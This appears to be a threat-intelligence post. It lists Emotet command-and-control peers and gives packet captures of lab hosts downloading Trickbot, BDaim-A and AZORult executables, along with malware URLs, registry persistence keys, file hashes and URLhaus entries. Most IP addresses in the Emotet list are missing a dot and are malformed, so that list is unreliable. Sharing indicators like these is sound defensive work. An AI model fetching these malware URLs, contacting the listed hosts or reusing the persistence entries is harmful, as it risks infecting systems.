Updated List of Emotet Banking Malware Trojan IP C2 Servers and Port Numbers

Emotet

Peers:
104.131.58132:8080
104.236.13772:8080
109.169.8613:8080
110.170.65146:80
111.125.7122:8080
112.218.134227:80
113.61.76239:80
116.48.138115:80
116.48.14832:80
118.36.70245:80
119.59.124163:8080
125.99.61162:7080
130.204.247253:80
138.68.1064:7080
139.162.11888:8080
14.160.93230:80
142.127.5763:8080
142.93.114137:8080
144.139.56105:80
144.217.117207:8080
149.62.173247:8080
151.237.36220:80
152.170.10899:443
159.203.204126:8080
163.172.40218:7080
165.228.19593:80
175.114.17883:443
178.79.163131:8080
181.198.20345:443
181.36.42205:443
181.61.143177:80
183.99.239141:80
185.160.2123:80
185.160.22926:80
185.86.148222:8080
186.15.8352:8080
186.68.48204:443
187.188.166192:8080
188.135.1549:80
188.216.24204:80
189.19.81181:443
190.100.153162:443
190.146.131105:8080
190.186.16423:80
190.195.129227:8090
190.210.184138:995
190.6.193152:8080
190.97.30167:990
191.103.7634:443
191.183.21190:80
192.241.14684:8080
2.139.158136:443
2.42.173240:80
2.44.16752:80
2.45.112134:80
200.119.11118:443
200.124.22532:80
200.58.83179:80
201.213.3259:80
203.130.069:80
203.25.1593:8080
207.154.20440:8080
212.237.5061:8080
212.71.237140:8080
217.199.160224:8080
219.75.66103:80
223.255.148134:80
37.120.185153:443
37.183.12132:80
37.187.663:8080
37.211.49127:80
45.50.177164:80
45.79.95107:443
45.8.136201:80
46.101.212195:8080
46.28.111142:7080
5.196.35138:7080
5.32.41106:80
5.88.2767:8080
50.28.51143:8080
51.255.165160:8080
58.171.3826:80
62.75.143100:7080
62.75.160178:8080
63.246.252234:80
63.248.1988:80
68.129.203162:443
68.174.15223:80
68.183.170114:8080
68.183.190199:8080
68.187.16028:443
69.163.3384:8080
72.29.55174:80
73.60.8210:80
74.59.18794:80
74.79.10355:80
77.27.22124:443
77.55.21177:8080
79.7.1141:80
80.11.15865:8080
81.157.23490:8080
82.196.15205:8080
82.36.10314:80
82.8.23251:80
83.165.78227:80
83.248.141198:80
85.152.208146:80
85.234.14394:8080
86.42.166147:80
87.106.46107:8080
87.106.7740:7080
91.117.8359:80
91.204.16319:8090
91.205.21557:7080
91.74.17546:80
91.83.93124:7080
93.144.22657:80
93.148.25290:80
93.67.154252:443
94.200.114162:80
96.126.12164:443
96.38.23410:80
96.61.113203:80
97.120.32227:80
97.81.12153:80
99.252.276:80

RED3.exe bbvaticanskeys.com 181.129.104.139.449 Trickbot Malware Banking Trojan PCAP download traffic sample

JA3 Fingerprint: f735bbc6b69723b9df7b0e7ef27872af
First seen: 2018-10-02 18:04:16 UTC
Last seen: 2020-01-15 05:53:57 UTC
Status: Blacklisted
Malware samples: 1'816
Destination IPs: 193
Malware: TrickBot
Listing date: 2020-01-09 14:17:18

2020-01-16 06:18:01.857421 IP 192.168.86.25.56294 > 94.23.64.40.80: Flags [P.], seq 1:444, ack 1, win 64240, length 443: HTTP: GET /RED3.exe HTTP/1.1
E…..@…;…V.^.@(…P-C.>.ca.P…ch..GET /RED3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bbvaticanskeys.com
Connection: Keep-Alive
Cookie: SERVERID104280=112034|XiBGX|XiBGX

2020-01-16 06:18:01.968837 IP 94.23.64.40.80 > 192.168.86.25.56294: Flags [.], seq 1:1461, ack 444, win 30016, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.1.{.^.@(..V..P…ca.-C..P.u@C…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:18:02 GMT
Content-Type: application/x-msdownload
Content-Length: 544922
Server: Apache
Last-Modified: Mon, 13 Jan 2020 09:26:46 GMT
Accept-Ranges: bytes
Set-Cookie: SERVERID104280=112034|XiBGb|XiBGX; path=/
Cache-control: private
X-IPLB-Instance: 29688

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………CW..-…-…-…!…-…>…-.}.#…-…’…-…)…-…,…-…>…-.$.1…-…&…-.F.+…-.Rich..-……………..PE..


2020-01-16 06:20:49.039935 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], ack 96, win 229, length 0
E..(N0@.,……,..V…..Tu..d…P………….
2020-01-16 06:20:49.041211 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], seq 1:1461, ack 96, win 229, length 1460
E…N1@.,..G…,..V…..Tu..d…P………..Q…M…...#...a.5..$..}p./r./O.S...I. .p....@.....8j.....@.I..*...O.I../........... ... .. ...0..\0..D……..jj1……6K.z…>0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…200115041028Z..200414041028Z0.1.0…U…
teene.site0..”0.. *.H………….0..
……..z=..1C……….U[4MH1.m…..q……….{..S$S.2..-…..i…(‘*.%…Q..r..hP55…….7.uO….@.”…..z…%%.A….0..t.s..y)…Im……….D.K.F+.~.I..%.w.PK….
..Mf…~<:…M..3{..&….G.. ..N…Q..Y..+.>Uu.7n.i…&…..~..m1Y.d].z…7…..j,..l..%……..o0..k0…U………..0…U.%..0…+………+…….0…U…….0.0…U……..a…<…6 ….1…0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0%..U….0.. teene.site..www.teene.site0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..o../……G0E. g.[^…s..E.u.U…N….N…..!…!…z…../..Y.S..IN.l.K.hKW.}f8″..v…..}h…..#….W|W..j..a:.i……o../……G0E.!…..?”.<`?.y.n…=I..h……P…. b..E……M…0….v…,..JX.#..0.. *.H………….S…). ……..h..W….(….WV..jb.w.H!..>q.W.0A.:.{T. .E……:vZ.c….,L..Z#..E..7….I.S……..B.~……/.O”(..V.7/.h…..R.6.>..W5…..r1… …..).w……o….u…………..5._.Y…………PX…{n…-W….{…..g.L.Ew.9(K’…..R..
2020-01-16 06:20:49.042164 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [P.], seq 1461:2664, ack 96, win 229, length 1203
E…N2@.,..G…,..V…..Tu..d…P….(….8…P…C.nA……0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..

…..]y..r.g..r.9.,.W.y~…F….O_..B.V..<.D.?.nFs..(2dn….#.vp..s#..d………R…- ww...g#.&.......7:......m.-.(.._.......? "....}..2w...$..n.X0.....x..,#A......Db.'.n..|... ....o....Z..x[S...~T..Y...B..R$...l...t.=..s..... ..Dh.q.p._....oN<..:7.L^l5._...._.....#KK.^qYkECFg".t.S...{u.x ...X%....Ej.EQ...];7.....%6....p.x..&...R2...+X.$V.Z..e......|!.r.. w.lv....-?Ysd.49 ...F...O...m..p.8...N....T...x...'.#.h..Q.P.%'..oo.'q...."._u...j.x.g…ep.N:$…..,..E….7..A-…..~.@…….8..+ 5…..H..…>.s`D=…\M..l…….’.C.]ZV…;.-..
..J. “…H.W-f.. .y.k…./{M …[.b.M…2~….UA0….LY..T(]…’.R!..c…….*5..7).S….h.O.]#(.]e….j…..
..uPt…,Q….[.wi68

2020-01-16 06:22:09.646400 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 14707, win 484, length 0
E..(..@….S..h…V……..H…P…v………
2020-01-16 06:22:09.658336 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 16167, win 507, length 0
E..(..@….R..h…V……..H..rP…q$……..
2020-01-16 06:22:09.658340 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 17627, win 530, length 0
E..(..@….Q..h…V……..H..&P…kY……..
2020-01-16 06:22:09.658343 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 19087, win 553, length 0
E..(..@….P..h…V……..H…P..)e………
2020-01-16 06:22:09.659263 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 20547, win 575, length 0
E..(..@….O..h…V……..H…P..?_………
2020-01-16 06:22:09.659268 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 23467, win 621, length 0
E..(..@….N..h…V……..H…P..mT………
2020-01-16 06:22:09.659271 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 24633, win 644, length 0
E..(..@….M..h…V……..H…P…O………
2020-01-16 06:22:10.237209 ARP, Request who-has 192.168.86.25 (00:0c:29:6d:82:4f) tell 192.168.86.1, length 46

Trojan Malware BDaim-A (c000.exe, vbc.exe) with Malicious X.509 SSL Certificate: PCAP File Download Traffic Sample

Troj/BDaim-A is a backdoor trojan.

The Trojan installs itself as uvwxyz.exe in the Windows system folder and creates the following files, also in the system folder:

mswinsck.ocx (this is the clean Microsoft Winsock control)
raim.ocx

Troj/BDaim-A creates the following registry entry so that it automatically starts up with Windows:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\uvwxyz = C:\WINDOWS\System32\uvwxyz.exe

In addition, Troj/BDaim-A creates the following registry entries:

HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Host = "localhost"
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Port = dword:0000103f
HKCU\Software\Microsoft\Visual Basic\
HKCU\Software\Microsoft\Visual Basic\6.0\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Control\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel = "Apartment"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\(default) = "0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\(default) = "132497"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\(default) = "MSWinsock.Winsock.1"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Programmable\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX, 1"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\(default) = "1.0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\(default) = "MSWinsock.Winsock"
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "Winsock General Property Page Object"
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "IMSWinsockControl"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\(default) = "{00020424-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\(default) = "{00020424-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "DMSWinsockControlEvents"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\(default) = "{00020420-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\(default) = "{00020420-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0"
HKCR\MSWinsock.Winsock\
HKCR\MSWinsock.Winsock\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\MSWinsock.Winsock.1\
HKCR\MSWinsock.Winsock.1\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\MSWinsock.Winsock.1\CLSID\
HKCR\MSWinsock.Winsock.1\CLSID\(default) = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\MSWinsock.Winsock\CLSID\
HKCR\MSWinsock.Winsock\CLSID\(default) = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\MSWinsock.Winsock\CurVer\
HKCR\MSWinsock.Winsock\CurVer\(default) = "MSWinsock.Winsock.1"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\(default) = "Microsoft Winsock Control 6.0 (SP5)"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS\(default) = "2"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR\(default) = ""

URLhaus Database

You are currently viewing the URLhaus database entry for http://f0384177.xsph.ru/LO/c000.exe, which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and those that have been set up by cybercriminals for the sole purpose of serving malware.

Database Entry

ID: 286246
URL: http://f0384177.xsph.ru/LO/c000.exe
URL Status: Offline
Host: f0384177.xsph[.]ru
Date added: 2020-01-11 10:33:04 UTC
Threat: Malware download

2020-01-16 06:45:23.373218 IP 192.168.86.25.56261 > 151.80.241.110.80: Flags [P.], seq 1:432, ack 1, win 16425, length 431: HTTP: GET /mich/vbc.exe HTTP/1.1
E….q@…S/..V..P.n…P…*.WWkP.@).A..GET /mich/vbc.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: windowsdefenderserversecureserver.duckdns.org
Connection: Keep-Alive

2020-01-16 06:45:23.474701 IP 151.80.241.110.80 > 192.168.86.25.56261: Flags [.], seq 1:1461, ack 432, win 513, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.p.N..P.n..V..P…WWk….P…d…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:45:23 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 16 Jan 2020 04:32:10 GMT
ETag: “16ea00-59c3a4efb28b9”
Accept-Ranges: bytes
Content-Length: 1501696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2020-01-16 06:45:52.794502 IP 192.168.86.25.56262 > 141.8.192.151.80: Flags [P.], seq 1:402, ack 1, win 16425, length 401: HTTP: GET /LO/c000.exe HTTP/1.1
E…..@…...V……..PU.wZ.^3eP.@)….GET /LO/c000.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: f0384177.xsph.ru
Connection: Keep-Alive

2020-01-16 06:45:52.966457 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], ack 402, win 237, length 0
E..(J>@.+..0……V..P…^3eU.x.P………….
2020-01-16 06:45:53.040728 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], seq 1:1461, ack 402, win 237, length 1460: HTTP: HTTP/1.1 503 Service Unavailable
E…J?@.+..{……V..P…^3eU.x.P…….HTTP/1.1 503 Service Unavailable
Server: openresty
Date: Thu, 16 Jan 2020 11:45:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

2806



…….. …….. ……………………

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<link rel="stylesheet" type="text/css" href="https://index.from.sh/fonts.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/index.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/stub.css?10" />

2020-01-16 06:45:53.391894 IP 192.168.86.25.56265 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….|..V….”…. …Ae=
P.@)D…….y…u..^..S:i0..Z..o..i…..\c/u.E~ ……./.5…
….. .
.2.8…….4…………..index.from.sh……….
…………..
2020-01-16 06:45:53.392017 IP 192.168.86.25.56266 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….{..V….”….Py.*:..kP.@)$-……y…u..^..S ..mX..x.C+)8.w<.J..6-….U;…./.5… ….. . .2.8…….4…………..index.from.sh………. …………..
2020-01-16 06:45:53.528765 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], ack 127, win 229, length 0
E..(.8@.+……”..V………….P….0……..
2020-01-16 06:45:53.530363 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1:1461, ack 127, win 229, length 1460
E….9@.+……”..V………….P…/…….Y…U…at7.GRB..V.b…-.IK[Gs..&s…hO /.NQ….|.wX……v….E..c.A”.F…………………………..q0..m0..U…….. .b.h5.?…….0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U.
..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0…180312000000Z..200311235959Z0s1!0…U….Domain Control Validated1 0…U….Hosted by OnlineNic Inc1.0…U….PositiveSSL1.0…U….index.from.sh0..”0.. *.Hs………….0..
……..2Y
2s..v@…………..h2.m}..(.6...&......?s...Z).:....C..:....i.....-.E.r..]....e.6j.....;>...>.[.....5P[ .[.n....:..4. ...S...k...........?x......_...+..b.QU$1..Q..@...F....e&..."...^.....o3....f........g...4......smX>h...d....b!C.;. .G....P5.l.X............0...0...U.#..0.....j:.Z.....Vs.C.:(..0...U.......#k..=.k....R.$.E...0...U...........0...U.......0.0...U.%..0...+.........+.......0O..U. .H0F0:..+.....1....0+0)..+.........https://secure.comodo.com/CPS0...g.....0T..U...M0K0I.G.E.Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0....+........y0w0O..+.....0..Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$..+.....0...http://ocsp.comodoca.com0+..U...$0"..index.from.sh..www.index.from.sh0.. *.H.............c-.[.....p5..(]n.....-..2}.. .A(.?..'...O.,.X2.5d.4N.f.m......7..............Y>.X..G.F-....D.v....&Y....Y%......l.Cq...*1&.D.....>6.S...(>.....~!....Fs....C.39*.....p.k....u....h...A....Y...gmX............<M.p...gr
2020-01-16 06:45:53.530672 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1461:2921, ack 127, win 229, length 1460
E....:@.+......"..V........}....P.......[.Y....Y.V....%..<…..pm.Zl…..)s….C….0…0……….+.n..u6l..n..|..0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1+0)..U…”COMODO RSA Certification Authority0…140212000000Z..290211235959Z0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0..”0.. .H………….0.. ………..Y..85.,….I.d..b.E.:………..mw……..>….I…..K.. …^e.>..L…E^R/4.H$d.A…..g…z.S.;|…Uo.G |..”……W.p.`…-……..{...(!.Mo.O%..z5.&.F…Y5..N.CP?Y..lQ!.X…uPx>L…..k…;…R…$.n.’QE.p.%C…J…~..m…’s].E0….A…D………………..e0..a0…U.#..0…..~.=…<….8…22.0…U……..j:.Z…..Vs.C.:(..0…U………..0…U…….0…….0…U.%..0…+………+…….0…U. ..0.0…U. .0…g…..0L..U…E0C0A.?.=.;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q..+……..e0c0;..+…..0../http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$..+…..0…http://ocsp.comodoca.com0..
*.H………….N+vO..b6..w.’….D…>..ff.>.I..5…….5..6.u…Pr|..w….. ..g..V.{.D.B..]..PF….Yl…….:B…K4{‘;..o$;r.ctX<.l?O…….7

AZORult Rultazo PuffStealer Cryptocurrency Malware Crimeware PCAP file download Traffic Sample

AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Type: Stealer
Origin: ex-USSR
First seen: 1 January, 2016
Last seen: 16 January, 2020
Also known as: PuffStealer, Rultazo

Trojan-PSW.Win32.Azorult is considered dangerous by many security experts.

GridinSoft Anti-Malware


What can the Trojan-PSW.Win32.Azorult virus do?

  • Executable code extraction
  • Creates RWX memory
  • HTTP traffic contains suspicious features which may be indicative of malware related traffic
  • Performs some HTTP requests
  • Unconventional language used in binary resources: Farsi
  • The binary likely contains encrypted or compressed data.
  • Collects information to fingerprint the system
  • Anomalous binary characteristics

Related domains:

khaliddib398.xyz

How to identify Trojan-PSW.Win32.Azorult?

File Info:
crc32: F7C07C00
md5: a2e85c38491fd50c51557cd99748edab
name: him.exe
sha1: 52f3710027b010d418ebd232f0674f88ab5107f6
sha256: 51723411106486dba27a08d0ac93308bb4722e07ee87be574821e8d370699e2a
sha512: 7cc8b75799bd6ae1e1dac56260736b3d52a18168dad76ac82e1c1c0183d603c3118075e021539232f36351301dc01e552d1f77c5031e4ede08d6330e2fe1ce1e
ssdeep: 3072:HqUbL9xr60GRV8L1ogVxnyXeM1HpkAlF5U8nIQ/F7ZHWAAfnH:nbL9x+WL13V97upCSIQ7ufH
type: PE32 executable (GUI) Intel 80386, for MS Windows

URLhaus Database

You are currently viewing the URLhaus database entry for http://khaliddib398.xyz/him.exe, which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and those that have been set up by cybercriminals for the sole purpose of serving malware.

Database Entry


ID: 286968
URL: http://khaliddib398.xyz/him.exe
URL Status: Online
Host: khaliddib398[.]xyz
Date added: 2020-01-13 10:18:07 UTC
Threat: Malware download

2020-01-16 06:39:35.774113 IP 192.168.86.25.56313 > 45.143.138.58.80: Flags [P.], seq 1:507, ack 1, win 16425, length 506: HTTP: GET /him.exe HTTP/1.1
E..”..@….Q..V.-..:…P…..dfuP.@)X…GET /him.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=114742-
Unless-Modified-Since: Mon, 13 Jan 2020 20:20:02 GMT
If-Range: "39800-59c0b33451988"
Host: khaliddib398.xyz
Connection: Keep-Alive

2020-01-16 06:39:35.928724 IP 45.143.138.58.80 > 192.168.86.25.56313: Flags [.], ack 507, win 11, length 0
E..(..@.+..C-..:..V..P…dfu….P…co……..
2020-01-16 06:39:35.947882 IP 45.143.138.58.80 > 192.168.86.25.56313: Flags [.], seq 1:1461, ack 507, win 11, length 1460: HTTP: HTTP/1.1 206 Partial Content
E…..@.+…-..:..V..P…dfu….P…….HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 16 Jan 2020 11:39:36 GMT
Content-Type: application/octet-stream
Content-Length: 120778
Connection: keep-alive
Last-Modified: Mon, 13 Jan 2020 20:20:02 GMT
ETag: "39800-59c0b33451988"
Accept-Ranges: bytes
Content-Range: bytes 114742-235519/235520

2020-01-16 06:39:39.675330 IP 192.168.86.25.56297 > 23.12.144.167.80: Flags [R.], seq 1165498645, ack 1141672289, win 0, length 0
E..(..@…/G..V……..PEx..D..aP….&……..
2020-01-16 06:39:39.675478 IP 192.168.86.25.56294 > 23.12.144.167.80: Flags [R.], seq 2669052771, ack 1221014750, win 0, length 0
E..(..@…/F..V……..P…cH.4.P…u………
2020-01-16 06:39:39.675480 IP 192.168.86.25.56312 > 172.217.9.195.80: Flags [R.], seq 23004971, ack 674304303, win 0, length 0
E..(..@… ..V… ….P..+(1./P….?……..
2020-01-16 06:39:39.675482 IP 192.168.86.25.56308 > 72.21.91.29.80: Flags [R.], seq 916649304, ack 837624765, win 0, length 0
E..(..@…3…V.H.[….P6..X1.#.P………….
2020-01-16 06:39:39.675484 IP 192.168.86.25.56299 > 23.12.144.174.80: Flags [R.], seq 1681878668, ack 3512185746, win 0, length 0
E..(..@…/<..V……..Pd?n..W..P….b……..
2020-01-16 06:39:39.675486 IP 192.168.86.25.56298 > 23.12.144.174.80: Flags [R.], seq 1921844081, ack 3009432550, win 0, length 0
E..(..@…/;..V……..Pr..q.`K.P………….
